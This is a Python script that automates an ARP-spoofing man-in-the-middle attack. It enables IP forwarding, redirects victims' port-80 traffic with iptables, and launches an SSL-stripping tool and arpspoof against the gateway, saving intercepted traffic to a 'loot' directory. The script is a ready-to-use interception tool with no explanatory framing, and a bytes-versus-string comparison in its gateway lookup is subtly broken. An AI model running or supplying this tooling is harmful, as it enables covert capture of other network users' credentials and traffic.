#!/usr/bin/env python3
import subprocess, shlex, re
from x import *

def x(c): return subprocess.Popen(shlex.split(c), stdout=subprocess.PIPE)

ps={}
port=8100
geo="--geometry=200x80"
term='xterm'

def getifgate():
  p=x("route -n")
  for l in p.stdout.readlines()[2:]:
    s=l.decode().split()
    if s[1]!=b"0.0.0.0":
      return str(s[1]), str(s[7])

def setup(port=8100):
  f=open('/proc/sys/net/ipv4/ip_forward',"w")
  f.write("1")
  f.close()
  x("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port " + str(port))

def clean():
  f=open('/proc/sys/net/ipv4/ip_forward',"w")
  f.write("0")
  f.close()
  x("iptables --flush")
  for p in ps.values():
    p.kill()

#try:
if True:
  gate, iface = getifgate()
  setup(port)
  dr = makeloot('amanda')
  ps['ssls']=x('%s %s -e "ssls -k -l %d -w %s"' % (term, geo, port, dr+"ssls.log"))
  ps['arp']=x('%s %s -e "arpspoof -i %s %s"' % (term, geo, iface, gate))
  i = input("> ")
  clean()
#except: clean()
